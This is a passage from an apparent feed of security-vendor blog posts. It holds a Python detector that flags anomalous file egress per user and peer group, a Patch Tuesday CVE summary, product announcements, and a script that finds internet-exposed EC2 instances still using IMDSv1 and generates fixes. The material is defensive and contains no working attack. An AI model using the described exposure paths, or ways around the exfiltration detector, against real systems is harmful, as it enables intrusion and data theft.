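    """User Level: compare the day's file count per channel with the user's own history."""
    history = defaultdict(list)
    today = {}
    for (user, channel, d), n in _daily_totals(events).items():
        if d < day:
            history[(user, channel)].append(n)
        elif d == day:
            today[(user, channel)] = n
    signals = {}
    for key, n in today.items():
        hist = history[key]
        if len(hist) < MIN_HISTORY_DAYS:
            continue                       # new user: skip rather than guess a baseline
        mu = mean(hist)
        sigma = max(pstdev(hist), 1.0)     # floor so a perfectly flat history cannot divide by zero
        z = (n - mu) / sigma
        if z >= Z_THRESHOLD:
            signals[key] = (z, f"{n} files vs. baseline {mu:.1f} (z={z:.1f})")
    return signals


def peer_level_filetype_signals(events, day):
    """Peer Level: flag file types the user's peer group has never egressed on that channel."""
    seen = defaultdict(set)
    for e in events:
        if e.day < day:
            seen[(e.peer_group, e.channel)].add(e.file_type)
    signals = defaultdict(list)
    for e in events:
        if e.day == day and e.file_type not in seen[(e.peer_group, e.channel)]:
            signals[(e.user, e.channel)].append(
                f"file type '{e.file_type}' unseen for peer group '{e.peer_group}' on {e.channel}")
    return signals


def detect(events, day):
    """Combine both levels; severity reflects how much independent evidence there is."""
    volume = user_level_volume_signals(events, day)
    peer = peer_level_filetype_signals(events, day)
    detections = []
    for key in sorted(set(volume) | set(peer)):
        det = Detection(user=key[0], channel=key[1], day=day)
        if key in volume:
            det.signals.append(volume[key][1])
        det.signals.extend(peer.get(key, []))
        # Two independent signals, or an extreme volume deviation, raise the severity
        if len(det.signals) >= 2 or (key in volume and volume[key][0] >= 2 * Z_THRESHOLD):
            det.severity = "high"
        detections.append(det)
    return detections


def constructed_events():
    """Constructed sample telemetry: ten quiet days, then one day with two scenarios."""
    alice_daily = [12, 11, 13, 12, 10, 14, 12, 11, 13, 12]
    ev = []
    for d in range(1, 11):
        ev.append(EgressEvent(d, "alice", "finance", "usb", "xlsx", alice_daily[d - 1]))
        ev.append(EgressEvent(d, "bob", "finance", "web", "docx", 2 + d % 2))
        ev.append(EgressEvent(d, "carol", "engineering", "web", "py", 5))
    ev.append(EgressEvent(11, "alice", "finance", "usb", "xlsx", 400))   # bulk USB copy
    ev.append(EgressEvent(11, "bob", "finance", "web", "py", 1))         # low volume, atypical type
    ev.append(EgressEvent(11, "carol", "engineering", "web", "py", 6))   # normal for her peers
    ev.append(EgressEvent(11, "dave", "finance", "usb", "xlsx", 50))     # no history yet
    return ev


if __name__ == "__main__":
    for det in detect(constructed_events(), day=11):
        print(det.severity.upper(), det.user, det.channel, "; ".join(det.signals))
```

Run on the constructed data, alice's 400-file USB day is flagged high on volume alone, bob's single source-code upload is flagged on the peer signal even though its volume is below his baseline, carol's source-code upload is not flagged because it is normal for the engineering cohort, and dave is not scored because he has no history yet.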

Company Level: Tailoring Anomalies to Expected Activity

At the Company Level, user behavioral analytics are magnified to account for the nuances of each organization’s business processes and to tailor anomalies to their expected activity. This involves incorporating domain-specific knowledge and contextual understanding of the organization’s workflows and operations based on file movements and general data movement.

By aligning detection algorithms with the organization’s unique business processes, security teams can more accurately identify deviations from expected activity and prioritize them based on their relevance to the organization’s security posture. For example, anomalies that deviate from standard workflows or access patterns can be flagged for further investigation, while routine activities are filtered out to minimize noise. Additionally, behavioral analytics at the Company Level enable organizations to adapt to changes in their environment such as organizational restructuring, new business initiatives or shifts in employee behavior. This agility ensures detection capabilities remain relevant and effective over time.

Figure 2. Falcon Data Protection Detections detailed overview

Figure 3. Falcon Data Protection Detections baseline file and data volume versus detection file and data volume


The Details panel includes the detection’s number of files and data volume moved versus the established baselines per user, peers and the organization. This panel also contains contextual factors such as first-time use of a USB device or web destination, and metadata associated with the file activity, to better understand the legitimate reasons behind certain user behaviors. This nuanced approach provides a greater level of confidence that a detection indicates a true positive for data exfiltration.

Rule-based Detections: Enhancing the Power of Classifications and Rules

In addition to the aforementioned anomaly detections, you can configure rule-based detections associated with your data classifications. This enhances the power of data classification to assign severity, manage triage and investigation, and trigger automated workflows. Pairing these with anomaly detections gives your team more clarity into what to pursue first and lets you establish blocking policies for actions that should not occur.

Figure 4. Built-in case management and investigation tools help streamline team processes


Traditional approaches to data exfiltration detection often rely on manual monitoring, which is labor-intensive and time-consuming, and strict behavior definitions, which lack important context and are inherently limited in their effectiveness. These methods struggle to keep pace with the rapidly evolving threat landscape, making it challenging for organizations to detect and mitigate data exfiltration in real time. As a result, many organizations are left vulnerable to breaches. By pairing manual data classification with the detections framework, organizations’ institutional knowledge is enhanced by the power of the Falcon platform.

Figure 5. Turn on rule-based detections in your classification rules


Combining the manual approach with the assistance of advanced machine learning models and automation brings the best of both worlds, paired with the institutional knowledge and subject matter expertise of your team.

Stop Data Theft: Automate Detection and Response with Falcon Fusion Workflows

When you integrate with Falcon Fusion SOAR, you can create workflows to precisely define the automated actions you want to perform in response to Falcon Data Protection Detections. For example, you can create a workflow that automatically generates a ServiceNow incident ticket or sends a Slack message when a high-severity data exfiltration attempt is detected.

Falcon Data Protection Detections uses advanced machine learning algorithms and behavioral analytics to identify anomalous patterns indicative of data exfiltration. By continuously monitoring user behavior and endpoint activities, Falcon Data Protection can detect and mitigate threats in real time, reducing the risk of data breaches and minimizing the impact on organizations’ operations. Automation enables organizations to scale their response capabilities efficiently, allowing them to adapt to evolving threats and protect their sensitive assets. With automated investigation and response, security teams can shift their efforts away from sifting through vast amounts of data manually to investigating and mitigating high-priority threats.


May 2024 Patch Tuesday: Two Zero-Days Among 61 Vulnerabilities Addressed

Microsoft has released security updates for 61 vulnerabilities in its May 2024 Patch Tuesday rollout. There are two zero-day vulnerabilities patched, affecting Windows MSHTML (CVE-2024-30040) and Desktop Window Manager (DWM) Core Library (CVE-2024-30051), and one Critical vulnerability patched affecting Microsoft SharePoint Server (CVE-2024-30044).

May 2024 Risk Analysis

This month’s leading risk type is remote code execution (44%) followed by elevation of privilege (28%) and information disclosure (11%). This follows the trend set last month.

Figure 1. Breakdown of May 2024 Patch Tuesday attack types


Windows products received the most patches this month with 47, followed by Extended Security Update (ESU) with 25 and Developer Tools with 4.

Figure 2. Breakdown of product families affected by May 2024 Patch Tuesday

Zero-Day Affecting Windows MSHTML Platform

CVE-2024-30040 is a security feature bypass vulnerability affecting the Microsoft Windows MSHTML platform with a severity rating of Important and a CVSS score of 8.8. Successful exploitation of this vulnerability would allow the attacker to circumvent the mitigation previously added to protect against an Object Linking and Embedding attack, and download a malicious payload to an unsuspecting host.

The downloaded payload can carry malicious embedded content; if the victim clicks on that content, the consequences can be severe. The MSHTML platform is used throughout Microsoft 365 and Microsoft Office products. Because this vulnerability is already being exploited, patching should be done immediately.

Severity    CVSS Score   CVE              Description
Important   8.8          CVE-2024-30040   Windows MSHTML Platform Security Feature Bypass Vulnerability

Table 1. Critical vulnerabilities in Windows MSHTML Platform

Zero-day Affecting Desktop Window Manager Core Library

CVE-2024-30051 is an elevation of privilege vulnerability affecting Microsoft Windows Desktop Window Manager (DWM) Core Library with a severity rating of Important and a CVSS score of 7.8. This library is responsible for interacting with applications in order to display content to the user. Successful exploitation of this vulnerability would allow the attacker to gain SYSTEM-level permissions.

CrowdStrike has detected active exploitation attempts of this vulnerability. Due to this exploitation status, patching should be done immediately to prevent exploitation.

Severity    CVSS Score   CVE              Description
Important   7.8          CVE-2024-30051   Windows DWM Core Library Elevation of Privilege Vulnerability

Table 2. Critical vulnerabilities in Windows Desktop Window Manager Core Library 

Critical Vulnerability Affecting Microsoft SharePoint Server

CVE-2024-30044 is a Critical remote code execution (RCE) vulnerability affecting Microsoft SharePoint Server with a CVSS score of 8.1. Successful exploitation of this vulnerability would allow an authenticated attacker with Site Owner privileges to inject and execute arbitrary code on the SharePoint Server.

Severity    CVSS Score   CVE              Description
Critical    8.1          CVE-2024-30044   Microsoft SharePoint Server Remote Code Execution Vulnerability

Table 3. Critical vulnerabilities in Microsoft SharePoint Server

Not All Relevant Vulnerabilities Have Patches: Consider Mitigation Strategies

As we have learned with other notable vulnerabilities, such as Log4j, not every highly exploitable vulnerability can be easily patched. As is the case for the ProxyNotShell vulnerabilities, it’s critically important to develop a response plan for how to defend your environments when no patching protocol exists.

Regular review of your patching strategy should still be a part of your program, but you should also look more holistically at your organization’s methods for cybersecurity and improve your overall security posture.

The CrowdStrike Falcon® platform regularly collects and analyzes trillions of endpoint events every day from millions of sensors deployed across 176 countries. Watch this demo to see the Falcon platform in action.

Learn More

Learn more about how CrowdStrike Falcon® Exposure Management can help you quickly and easily discover and prioritize vulnerabilities and other types of exposures here.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.


CrowdStrike Collaborates with NVIDIA to Redefine Cybersecurity for the Generative AI Era

14 May 2024 at 14:55

Your business is in a race against modern adversaries — and legacy approaches to security simply do not work in blocking their evolving attacks. Fragmented point products are too slow and complex to deliver the threat detection and prevention capabilities required to stop today’s adversaries — whose breakout time is now measured in minutes — with precision and speed.

As technologies change, threat actors are constantly refining their techniques to exploit them. CrowdStrike is committed to driving innovation for our customers, with a relentless focus on building and delivering advanced technologies to help organizations defend against faster and more sophisticated threats.

CrowdStrike is collaborating with NVIDIA in this mission to accelerate the use of state-of-the-art analytics and AI in cybersecurity to help security teams combat modern cyberattacks, including AI-powered threats. The combined power of the AI-native CrowdStrike Falcon® XDR platform and NVIDIA’s cutting-edge computing and generative AI software, including NVIDIA NIM, delivers the future of cybersecurity with community-wide, AI-assisted protection with the organizational speed and automation required to stop breaches.

“Cybersecurity is a data problem; and AI is a data solution,” said Bartley Richardson, NVIDIA’s Director of Cybersecurity Engineering and AI Infrastructure. “Together, NVIDIA and CrowdStrike are helping enterprises deliver security for the generative AI era.”

AI: The Great Equalizer

Advancements in generative AI present a double-edged sword in the realm of cybersecurity. AI-powered technologies create an opportunity for adversaries to develop and streamline their attacks, and become faster and stealthier in doing so.

Having said that, AI is the great equalizer for security teams. This collaboration between AI leaders empowers organizations to stay one step ahead of adversaries with advanced threat detection and response capabilities. By coupling the power of CrowdStrike’s petabyte-scale security data with NVIDIA’s accelerated computing infrastructure and software, including new NVIDIA NIM inference microservices, organizations are empowered with custom and secure generative AI model creation to protect today’s businesses.

Figure 1. Use Case: Detect anomalous IPs with Falcon data in Morpheus

Driving Security with AI: Combating the Data Problem

CrowdStrike creates the richest and highest fidelity security telemetry, on the order of petabytes daily, from the AI-native Falcon platform. Embedded in the Falcon platform is a virtuous data cycle where cybersecurity’s very best threat intelligence data is collected at the source, preventative and generative models are built and trained, and CrowdStrike customers are protected with community immunity. This collaboration helps Falcon users take advantage of AI-powered solutions to stop the breach, faster than ever.

Figure 2. Training with Morpheus with easy-to-use Falcon Fusion workflow automation

Figure 3. Query Falcon data logs for context-based decisions on potential ML solutions


Joint customers can meet and exceed necessary security requirements — all while increasing their adoption of AI technologies for business acceleration and value creation. With our integration, CrowdStrike can leverage NVIDIA accelerated computing, including the NVIDIA Morpheus cybersecurity AI framework and NVIDIA NIM, to bring custom LLM-powered applications to the enterprise for advanced threat detection. These AI-powered applications can process petabytes of logs to help meet customer needs such as:

  • Improving threat hunting: Quickly and accurately detect anomalous behavior indicating potential threats, and search petabytes of logs within the Falcon platform to find and defend against threats.
  • Identifying supply chain attacks: Detect supply chain attack patterns with AI models using high-fidelity security telemetry across cloud, identities and endpoints.
  • Protecting against vulnerabilities: Identify high-risk CVEs in seconds to determine whether a software package includes vulnerable or exploitable components.

Figure 4. Model evaluation and prediction with test data

The Road Ahead

The development work undertaken by both CrowdStrike and NVIDIA underscores the importance of advancing AI technology and its adoption within cybersecurity. With our strategic collaboration, customers benefit from having the best underlying security data to operationalize their selection of AI architectures with confidence to prevent threats and stop breaches.

At NVIDIA’s GTC conference this year, we highlighted the bright future ahead for security professionals using the combined power of Falcon data with NVIDIA’s advanced GPU-optimized AI pipelines and software. This enables customers to turn their enterprise data into powerful insights and actions to solve business-specific use cases with confidence.

By continuing to pioneer innovative approaches and delivering cutting-edge cybersecurity solutions for the future, we forge a path toward a safer world, ensuring our customers remain secure in the face of evolving cyber threats.


CrowdStrike Enhances Cloud Asset Visualization to Accelerate Risk Prioritization

9 May 2024 at 15:04

The massive increase in cloud adoption has driven adversaries to focus their efforts on cloud environments — a shift that led to cloud intrusions increasing by 75% in 2023, emphasizing the need for stronger cloud security.

Larger scale leads to larger risk. As organizations increase their quantity of cloud assets, their attack surface grows. Each asset brings its own set of security concerns. Large cloud environments are prone to more cloud misconfigurations, which provide more opportunities for adversaries to breach the perimeter. Furthermore, when breaches do occur, tracing lateral movement to stop malicious activity is challenging in a complex cloud environment.

CrowdStrike, a proven cloud security leader, has enhanced its CrowdStrike Falcon® Cloud Security capabilities to ensure security analysts can easily visualize their cloud assets’ connections so they can better understand and prioritize risks. Today we’re expanding our asset graph to help modern organizations secure everything they build in the cloud.

Stop Adversaries with Attack Path Analysis

We continue to expand our attack path analysis capabilities. Today, we’re announcing support for key AWS services including EC2, S3, IAM, RDS and container images.

With this enhanced support, CrowdStrike customers can quickly understand where their cloud weaknesses would allow adversaries to:

  • Gain initial access to their AWS environment
  • Move laterally to access vital compute resources
  • Extract data from storage buckets

Investigating cyberattacks can be a grueling, stressful task. The CrowdStrike Falcon® platform stops breaches and empowers security analysts to find the root cause of each attack. As Falcon’s attack path analysis extends further into the cloud, customers can leverage CrowdStrike® Asset Graph to more quickly investigate attacks and proactively resolve cloud weaknesses.

Figure 1. A filtered view of cloud assets shows all EC2 instances in the AWS account.


In this example, we are investigating an EC2 instance with a vulnerable metadata version enabled. We see the EC2 instance is open to global traffic, so we select “Asset Graph” to investigate.

In Asset Graph, an adversary’s potential entry point is automatically flagged for us. The access control list is misconfigured and accepts traffic from every IP address. Upon inspection, we quickly visualize how the adversary would move laterally to access our EC2 instance. To resolve this issue, we first restrict the access control list to company-specific IP addresses. Then, we update the metadata service version used by the EC2 instance.

Figure 2. The EC2’s attack path analysis reveals a potential entry point for adversaries.


Both indicators of attack (IOAs) and indicators of misconfiguration (IOMs) are available for each managed cloud asset. With this knowledge, security teams can quickly identify each asset that allows for initial access to their cloud. Furthermore, sensitive compute and storage assets are automatically traced to upstream security groups and network access lists that allow for initial access. Using Falcon’s attack path analysis, security teams quickly see the remediation steps required to protect their cloud from adversaries.

Investigate Findings with Query Builder

Speed and agility are massive cloud benefits. However, the ability to quickly spin up cloud resources can result in asset sprawl — an unexpectedly large number of cloud assets in a live environment. For example, in some environments, a single S3 bucket can be accessible to many IAM roles. Each of those IAM roles may contain access to a large quantity of other storage buckets. Security teams need a way to sift through massive cloud estates to find the services requiring attention.

Figure 3. A CrowdStrike Asset Graph view reveals the many connections between cloud assets.


The Falcon query builder capabilities allow security teams to ask questions like:

  • Which EC2 instances are internet-facing and contain critical security risks?
  • Have any IOAs appeared on my AWS assets in the last seven days?
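The investigation walked through earlier (an EC2 instance reachable from every IP address, still using the older metadata service version) and the first query above can both be expressed as checks over an asset inventory. The following is an added example written for this article, not Falcon's Asset Graph or query builder: it uses the field names of the EC2 DescribeInstances and DescribeSecurityGroups responses but only a trimmed subset of them, and the security groups, instances and per-instance finding severities are constructed. It flags the entry point, chains it with the IMDSv1 setting into the path an investigator would read off the graph, and emits the corrected settings in the same order the article remediates them.

```python
"""Added example: internet exposure plus IMDS version as an attack-path check.

Illustrative code written for this article; it is not Falcon Cloud Security's logic.
"""
import ipaddress

# Constructed inventory, trimmed to the fields this check uses. The field names follow
# EC2 DescribeSecurityGroups / DescribeInstances, but none of this is real account data.
SECURITY_GROUPS = {
    "sg-0aaa": {"IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
    "sg-0bbb": {"IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": "203.0.113.0/24"}]}]},
}
INSTANCES = [
    {"InstanceId": "i-0001", "PublicIpAddress": "198.51.100.10",
     "SecurityGroups": [{"GroupId": "sg-0aaa"}], "MetadataOptions": {"HttpTokens": "optional"}},
    {"InstanceId": "i-0002", "PublicIpAddress": "198.51.100.11",
     "SecurityGroups": [{"GroupId": "sg-0bbb"}], "MetadataOptions": {"HttpTokens": "required"}},
    {"InstanceId": "i-0003",   # no public address: not internet-facing even with an open group
     "SecurityGroups": [{"GroupId": "sg-0aaa"}], "MetadataOptions": {"HttpTokens": "required"}},
]
# Constructed stand-in for each asset's finding severities (IOMs/IOAs)
FINDINGS = {"i-0001": ["critical"], "i-0002": ["low"], "i-0003": ["critical"]}


def world_open_rules(group_id):
    """Ingress rules in one security group that accept traffic from any address."""
    rules = []
    for perm in SECURITY_GROUPS[group_id]["IpPermissions"]:
        cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
        cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
        # A prefix length of 0 (0.0.0.0/0 or ::/0) means the whole address space
        if any(ipaddress.ip_network(c).prefixlen == 0 for c in cidrs):
            rules.append((group_id, perm["IpProtocol"], perm.get("FromPort"), perm.get("ToPort")))
    return rules


def entry_points(instance):
    """Rules through which the instance is reachable from the internet."""
    if not instance.get("PublicIpAddress"):
        return []
    return [r for sg in instance["SecurityGroups"] for r in world_open_rules(sg["GroupId"])]


def attack_path(instance):
    """Chain the exposure with the on-host weakness into the path an investigator would read."""
    steps = [f"entry: {sg} allows {proto}/{fp}-{tp} from any address"
             for sg, proto, fp, tp in entry_points(instance)]
    if steps and instance["MetadataOptions"].get("HttpTokens") != "required":
        steps.append("on-host: IMDSv1 still enabled (HttpTokens=optional); require IMDSv2")
    return steps


def internet_facing_with_critical(instances, findings):
    """The 'internet-facing EC2 instances with critical security risks' query."""
    return [i["InstanceId"] for i in instances
            if entry_points(i) and "critical" in findings.get(i["InstanceId"], [])]


def remediation(instance, allowed_cidr):
    """Corrected settings, in the article's order: restrict the rule, then require IMDSv2."""
    fixes = [{"GroupId": sg, "IpProtocol": proto, "FromPort": fp, "ToPort": tp, "CidrIp": allowed_cidr}
             for sg, proto, fp, tp in entry_points(instance)]
    if instance["MetadataOptions"].get("HttpTokens") != "required":
        fixes.append({"InstanceId": instance["InstanceId"], "MetadataOptions": {"HttpTokens": "required"}})
    return fixes


if __name__ == "__main__":
    for inst in INSTANCES:
        for step in attack_path(inst):
            print(inst["InstanceId"], step)
    print("query result:", internet_facing_with_critical(INSTANCES, FINDINGS))
    print("fixes:", remediation(INSTANCES[0], "203.0.113.0/24"))  # constructed corporate range
```

On the constructed data only i-0001 has both an entry point and a critical finding; i-0003 shares the open security group but has no public address, and i-0002 is only reachable from a single documentation-range prefix, so neither appears in the query result.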

Figure 4. A query checking for internet-facing EC2 instances with critical security risks.


With Falcon’s query builder, pinpointing cloud weaknesses becomes an efficient process. Graphical views of cloud assets can be daunting. Building queries with Falcon enables teams to focus their attention on the assets that matter most: those that are prone to exploitation by adversaries.

Delivered from the Unified CrowdStrike Falcon Platform

The expansion of cloud asset visualization is another step toward providing a single console that addresses every cloud security concern. By integrating IOAs and IOMs with a connected asset map, CrowdStrike offers a robust, efficient solution for investigating today’s cloud security challenges. 

Unlike other vendors that may offer disjointed security components, CrowdStrike’s approach integrates elements across the entire cloud infrastructure. From hybrid to multi-cloud environments, everything is managed through a single, intuitive console within the AI-native CrowdStrike Falcon platform. This unified cloud-native application protection platform (CNAPP) ensures organizations achieve the highest standards of security, effectively shielding against breaches with an industry-leading cloud security solution. The cloud asset visualization, while pivotal, is just one component of this comprehensive CNAPP approach, underscoring CrowdStrike’s commitment to delivering unparalleled security solutions that meet and anticipate the adversaries’ attacks on cloud environments.

Get a free Cloud Security Health Check and see Falcon Cloud Security in action for yourself.  

During the review, you will engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment, and identify misconfigurations, vulnerabilities and potential cloud threats. 


CrowdStrike Cloud Security Defines the Future of an Evolving Market

6 May 2024 at 15:19

Today’s businesses are building their future in the cloud. They rely on cloud infrastructure and services to operate, develop new products and deliver greater value to their customers. The cloud is the catalyst for digital transformation among organizations of all sizes and industries.

But while the cloud powers immeasurable speed, growth and innovation, it also presents risk. The adoption of cloud technologies and modern software development practices has driven an explosion in the number of services, applications and APIs organizations rely on. For many, the attack surface is larger than ever — and rapidly expanding.

Adversaries are taking advantage of the shift. Last year, CrowdStrike observed a 75% increase in cloud intrusions and a 110% spike in cloud-conscious incidents, indicating threat actors are increasingly adept at breaching and navigating cloud environments. Cloud is the new battleground for modern cyber threats, but most organizations are not prepared to fight on it.

It’s time for a pivotal change in how organizations secure their cloud environments. CrowdStrike’s vision is to simplify and scale cloud security through a single, unified platform so security teams can protect the business with the same agility as their engineering colleagues. Our leadership in cloud security demonstrates our results so far: Most recently, we were recognized as a leader in The Forrester Wave™: Cloud Workload Security, Q1 2024 and a global leader in Frost & Sullivan’s Frost Radar: Cloud-Native Application Protection Platforms, 2023.

Today, our commitment to cloud security innovation continues. I’m thrilled to announce the general availability of CrowdStrike Falcon Application Security Posture Management (ASPM) and the expansion of our cloud detection and response (CDR) capabilities. Let’s dive into the details.

CrowdStrike CNAPP Extends Cloud Security to Applications

With the integration of ASPM into Falcon Cloud Security, CrowdStrike brings together the most critical CNAPP capabilities in a single, cloud-native platform, delivering the deep visibility, DevOps workflow integrations and incident response capabilities teams need to secure their cloud infrastructure and applications.

The demand for strong application security has never been greater: 71% of organizations report releasing application updates at least once a week, 23% push updates multiple times per week and 19% push updates multiple times per day. Only 54% of major code changes undergo a full security review before they’re deployed to production. And 90% of security teams use 3+ tools to detect and prioritize application vulnerabilities, making prioritization a top challenge for most.

CrowdStrike now delivers a unified CNAPP platform that sets a new standard for modern cloud security with:

  • Business Threat Context: DevSecOps teams can quickly understand and prioritize high-risk threats and vulnerabilities affecting sensitive data and the mission-critical applications organizations rely on most.
  • Deep Runtime Visibility: With comprehensive monitoring across runtime environments, security teams can rapidly identify vulnerabilities across cloud infrastructure, workloads, applications, APIs, GenAI and data to eliminate security gaps.
  • Runtime Protection: Fueled by industry-leading threat intelligence, Falcon Cloud Security detects and prevents cloud-based threats in real-time.
  • Industry-Leading MDR and CDR: By unifying industry-leading managed threat hunting and deep visibility across cloud, identity and endpoints, CrowdStrike’s CDR accelerates detection and response across every stage of a cloud attack, even as threats move laterally from cloud to endpoint.
  • Shift-Left Security: By embedding security early in the application development lifecycle, Falcon Cloud Security enables teams to proactively address potential issues, streamlining development and driving efficiency across development and security operations.

Application security is cloud security — but no vendor has successfully incorporated a way to protect the apps that companies build to support business-critical functions and drive growth and revenue. CrowdStrike now provides a single, holistic solution for organizations to secure everything they create and run in the cloud.

CrowdStrike Expands Cloud Detection and Response Leadership

CrowdStrike’s unified approach to CDR brings together world-class adversary intelligence, elite 24/7 threat hunting services and the industry’s most complete CNAPP. We are expanding our threat hunting with unified visibility across and within clouds, identities and endpoints to stop every stage of a cloud attack — even as threats move laterally from cloud to endpoint.

Our new CDR innovations are built to deliver the industry’s most comprehensive CDR service, drive consolidation across cloud security operations and stop breaches. This release empowers users to:

  • Protect Cloud Control Planes: Beginning with Microsoft Azure, CrowdStrike expands visibility into cloud control plane activity, complementing existing threat hunting for cloud runtime environments.
  • Stop Cloud Identity Threats: Our unified platform approach enables cloud threat hunters to monitor and prevent compromised users and credentials from being exploited in cloud attacks.
  • Prevent Lateral Movement: The CrowdStrike Falcon platform enables CrowdStrike cloud threat hunters to track lateral movement from cloud to endpoint, facilitating rapid response and actionable insights for decisive remediation from indicators to root cause.

By uniting industry-leading managed threat hunting and deep visibility across cloud, identity and endpoints, CrowdStrike accelerates detection and response at every stage of a cloud attack. Our threat hunters rapidly detect, investigate and respond to suspicious behaviors and new attacker tradecraft while alerting customers of the complete attack path analysis of cloud-based threats.

Stop Breaches from Code to Cloud with CrowdStrike

Traditional approaches to securing cloud environments and applications have proven slow and ineffective. Security teams are overwhelmed with cybersecurity tools and alerts but struggle to gain the visibility they need to prioritize threats. Security engineers, often outnumbered by developers, must secure applications developed at a rapid pace. Tool fragmentation and poor user experience have led to more context switching, stress and frustration among security practitioners, and greater risk for organizations overall.

CrowdStrike, the pioneer of cloud-native cybersecurity, was born in the cloud to protect the cloud. We have been consistently recognized for our industry-leading cloud security strategy. Our innovations announced today continue to demonstrate our commitment to staying ahead of modern threats and building the technology our customers need to stop breaches.

Businesses must act now to protect their cloud environments — and the mission-critical applications and data within them — from modern adversaries. CrowdStrike is here to help.

CrowdStrike Named the Only Customers’ Choice in 2024 Gartner® “Voice of the Customer” for External Attack Surface Management

30 April 2024 at 16:17

As adversaries become faster and stealthier, they relentlessly search for vulnerable assets to exploit. Meanwhile, your digital footprint is expanding, making it increasingly challenging to keep track of all of your assets. It’s no wonder 76% of breaches in 2023 were due to unknown and unmanaged internet-facing assets.

Against this backdrop, it’s more critical than ever for organizations to maintain a continuous and comprehensive understanding of their entire attack surface. This is where CrowdStrike Falcon® Exposure Management comes in:

In the field of exposure management, the value of external attack surface management (EASM) cannot be overstated. In short, EASM helps organizations identify known and unknown internet-facing assets, get real-time visibility into their exposures and vulnerabilities, and prioritize remediation to reduce intrusion risk.

Integrated into Falcon Exposure Management are the robust EASM capabilities of CrowdStrike Falcon® Surface, which uses a proprietary real-time engine to continuously scan the internet, and map and index more than 95 billion internet-facing assets annually. This gives organizations a vital “outside-in” perspective on the exposure of these assets and helps security teams prioritize and address vulnerabilities — not based on generic vulnerability severity scores but based on real-world adversary behavior and tactics from CrowdStrike® Counter Adversary Operations threat intelligence.

The EASM capabilities of Falcon Exposure Management are best-in-class. But don’t just take it from us. Here’s what CrowdStrike customers had to say.

93% Willing to Recommend CrowdStrike

CrowdStrike is the only vendor named Customers’ Choice in the 2024 Gartner “Voice of the Customer” Report for External Attack Surface Management, with 93% of respondents saying they are willing to recommend CrowdStrike.

The “Voice of the Customer” is a document that synthesizes Gartner Peer Insights’ reviews into insights for IT decision makers. Here’s a sampling of the individual reviews and ratings on the Gartner Peer Insights page:

“Falcon Surface is the EASM you need.”

“The tool gives critical insight into your attack surface helping to show what you don’t know.”

“Strategic assessing for internet exposed assets.”

“A market analysis of external vulnerability analysis was carried out and after testing the product we were convinced to purchase it for the company.”

“Effective ASM solution byte per byte.”

“Easy and continuous vulnerability assessment, effective risk prioritization, accuracy on remediations guidance.”

Our mission is clear: to stop breaches. Understanding and reducing risk is critical to stopping the breach, and we thank our customers for their support and validation of the unified CrowdStrike Falcon® XDR platform as the definitive cybersecurity platform.

Falcon Exposure Management: A Critical Component of the Falcon Platform

Organizations are embracing cybersecurity consolidation to reduce cost and complexity while improving security outcomes. Understanding the reduction of cyber risk across the modern attack surface is a critical component of any organization’s cybersecurity strategy. 

Falcon Exposure Management unifies real-time security data from Falcon Surface for EASM, CrowdStrike Falcon® Discover for asset, account and app discovery, and CrowdStrike Falcon® Spotlight for vulnerability management. CrowdStrike received a Customers’ Choice distinction in the 2024 Gartner® Peer Insights™ Voice of the Customer for Vulnerability Assessment.

With AI-powered vulnerability management and a comprehensive visual mapping of all connected assets, Falcon Exposure Management dramatically speeds up detection and response times, transforming reactive operations into proactive cybersecurity strategies to stop breaches before they happen. Integration with real-time threat intelligence correlates exposures with adversary behavior to help prioritize based on business impact and the likelihood of real-world exploitation. 

While traditional approaches to exposure management use disjointed products, only CrowdStrike delivers Falcon Exposure Management from the Falcon platform, making it fast and easy for customers to deploy the exposure management capabilities they love with the single lightweight Falcon agent and single console.

By deploying Falcon Exposure Management on the Falcon platform, organizations can realize incredible benefits such as a projected 200% faster CVE prioritization to respond quickly to critical vulnerabilities, up to 75% reduction in attack surface to lower the risk of a breach and up to $200,000 USD in annual savings by consolidating point products.


*Based on 32 overall reviews as of December 2023.

GARTNER is a registered trademark and service mark, and PEER INSIGHTS is a trademark and service mark, of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from CrowdStrike. Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences with the vendors listed on the platform, should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

Additional Resources

CrowdStrike Named Overall Leader in Industry’s First ITDR Comparative Report

30 April 2024 at 09:10

The industry’s first identity detection and response (ITDR) analyst report names CrowdStrike an Overall Leader and a “cyber industry force.”

In KuppingerCole Leadership Compass, Identity Threat Detection and Response (ITDR) 2024: IAM Meets the SOC, CrowdStrike was named a Leader in every category — Product, Innovation, Market and Overall Ranking — and positioned the highest for Innovation among all eight vendors evaluated. We received the top overall position in the report and a perfect 5/5 rating in every criterion, including security, functionality, deployment, interoperability, usability, innovativeness, market position, financial strength and ecosystem.

CrowdStrike pioneered ITDR to stop modern attacks with the industry’s first and only unified platform for identity protection and endpoint security powered by threat intelligence and adversary tradecraft — all delivered on a single agent. The market has continued to recognize our leadership, with CrowdStrike being positioned furthest to the right of all eight vendors evaluated in KuppingerCole’s report.

Figure 1. The Overall Leader chart in the KuppingerCole Leadership Compass, Identity Threat Detection and Response (ITDR) 2024: IAM Meets the SOC

A Leader in Innovation

In 2023, 75% of attacks used to gain initial access were malware-free, highlighting the prevalence of identity-based attacks and use of compromised credentials. Since releasing CrowdStrike Falcon® Identity Threat Protection in 2020, CrowdStrike has been constantly innovating on the product to deliver a mature solution that stops modern identity attacks.

